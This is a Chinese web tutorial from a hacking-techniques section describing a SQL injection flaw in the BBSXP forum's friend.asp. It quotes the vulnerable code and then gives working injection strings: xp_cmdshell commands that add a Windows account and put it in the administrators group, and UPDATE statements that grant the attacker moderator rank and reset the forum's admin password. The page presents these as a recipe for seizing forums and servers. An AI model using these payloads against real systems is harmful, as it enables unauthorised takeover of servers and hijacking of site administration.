文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术黑客技术探索bbsxp sql版的漏洞
精品推荐
特别推荐
·简单方法查找黑客老巢
·一次入侵过程的公开分析
·快速利用135端口入侵个人电脑
·基础知识 初级黑客安全技术命令详解
·IPC$入侵的高级手段与方法
·在QQ上与任意陌生人聊天的新绝招
·“黑客”教你如何远程控制计算机
·多种DDoS攻击技术方法
·黑客入侵前的信息收集
·看黑客如何发动对电子邮件系统的攻击
·经典:各个网络端口的入侵方法
·防范黑客 从两大方面阻止域名被劫持
·黑客、红客、蓝客、飞客究竟是什么?
·认清虚虚实实的“ARP攻击”防御方法
·黑客知识 彻底堵死SQL注入工具漏洞
·赛迪网"IT技术百家讲坛"开讲 如何防御黑客?
·黑客如何利用DNS欺骗在局域网中挂马
·Windows黑客编程基础
·黑客很狡猾 如何减轻DDoS攻击危害?
·网络攻击的几种攻击与防御手法大揭秘
热点TOP10
·最详细的黑客入门法则
·“黑客”教你如何远程控制计算机
·我是怎么进入他人计算机的
·用IE即可轻松远程控制对方电脑
·谁能知道微软在你的计算机里隐藏的秘密
·一次入侵过程的公开分析
·从零开始学黑客:网络黑客新手入门指南
·迎刃而解——破解密码的常用工具
·黑客技术之知道对方IP入侵别人的电脑
·不用任何软件(木马程序)盗取账号密码
·简单方法查找黑客老巢
·经典常见计算机密码破解实用手册
·基础知识 初级黑客安全技术命令详解
·在QQ上与任意陌生人聊天的新绝招
·快速利用135端口入侵个人电脑
·流光5.0使用小窍门
·收费网站破解攻略
·黑客破解电脑密码实用技巧大全!
·IPC$入侵的高级手段与方法
·黑客入侵前的信息收集

探索bbsxp sql版的漏洞

日期:2004年3月25日 作者:清风网络学院 查看:[大字体 中字体 小字体]


内容:
漏洞描述:
   
相信大家都听过bbsxp吧,它是一款网上流行的论坛程序,我就不多作介绍了。这次我检测的是它的sql版,没过多久果然就发现了问题了   我们利用它可以掌握整个论坛的生杀大权,如果管理员sql服务器配置不当的话,甚至可以攻占整个服务器。
.............................................................................................................
漏洞分析:

这个漏洞主要出在friend.asp这个文件,让我们来看一下有问题的部分源码,下面是用户添加好友的程序:
   
sub add
if Request("username")="" then
error2("请输入您要添加的好友名字!")
end if

if Request("username")=Request.Cookies("username") then
error2("不能添加自己!")
end if


if conn.execute("Select count(id)from [user] where username='"&Request("username")&"'")(0)=0 then
error2("数据库不存在此用户的资料!")
end if


  只要求好友的名字不为空和不能添加自己,并没有过滤特殊符号,其实这个不能添加自己的限制也是能绕过的,不过也没什么用 :)。
.....................................................................................................................
利用方法:

  注册随便注册一个用户,这里我注册的是pinkeyes,好,转到个人控制面板,添加一个论坛存在的人为好友,这里我选的人是king,
选择添加好友按钮,这时会弹出一个输入框,在里面输入:

king' ;exec master.dbo.xp_cmdshell 'net user pinkeyes pinkeyes /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

添加了一个名为pinkeyes,密码为pinkeyes的账户。

.....................................................................................................................

再来: king' ;exec master.dbo.xp_cmdshell 'net localgroup administrators pinkeyes /add';-- 
    
   把pinkeyes加到管理员用户组中。下面的事就不用我说了吧!

注意:如果连接数据库的账号没有权限的话或管理员删除了master.dbo.xp_cmdshell这个存储过程的话是不会成功.但是你可以对这个数据库做
任何事。
..........................................................................................................................
   如果不能添加账户也没关系,也阻挡不了我前进的步伐。好,下面我来讲一下利用方法:
仍然是添加好友,输入:
king' ;update [user] set membercode=5,levelname='社区区长' where username='pinkeyes' --
把pinkeyes提升为社区区长,前台工作。

再来输入:

king';update clubconfig set administrators='│pinkeyes│',adminpassword='pinkeyes'  --

把后台管理员设为pinkeyes,密码也为pinkeyes

ok,现在你是管理员了,要干什么就干什么吧!




如有见意,可上 http://xiaomutou.51.net/bbs/index.php and http://smallhome.51.net/lcx/wdb/index.php :)

(出处:清风网络学院


[1] 




上一篇:剖析Windows任务管理器开发原理与实现

下一篇:测试我们学校服务器的安全性

探索bbsxp sql版的漏洞 相关文章:
·Windows系统漏洞修复软件大比拼
·Flash漏洞最新疫情:一周感染190万用户
·利用腾讯漏洞取回QQ密码
·探索 音频无损压缩格式大家族
·ASP网站漏洞及入侵防范方法
·黑客发布针对微软软件漏洞的攻击新代码
·安全漏洞的起因:ActiveX技术安全报告
·IE7再爆URL解析漏洞 用户可被劫持
·[深度探索]男人为何喜欢摸女人的胸部
·QQ-ZONE绕过密码访问漏洞
探索bbsxp sql版的漏洞 相关软件:
·探索天蚕变汉化版
·探索·发现之历史不容忘却(修改版)
·深度探索C++对象模型
·Win2000输入法漏洞最新官方补丁中文版
·紫光输入法漏洞补丁(ThunPack) V1.0
·光华系统漏洞修护工具 V06.08
·花之探索(FlowerQuest)
·江民光标漏洞蠕虫专杀工具 V1.0
·北极探索(Arctic Quest)
·金山毒霸漏洞修复 2007 漏洞库 2006.10.20

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.net
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved. 鄂ICP备05000083号Powered by:viphot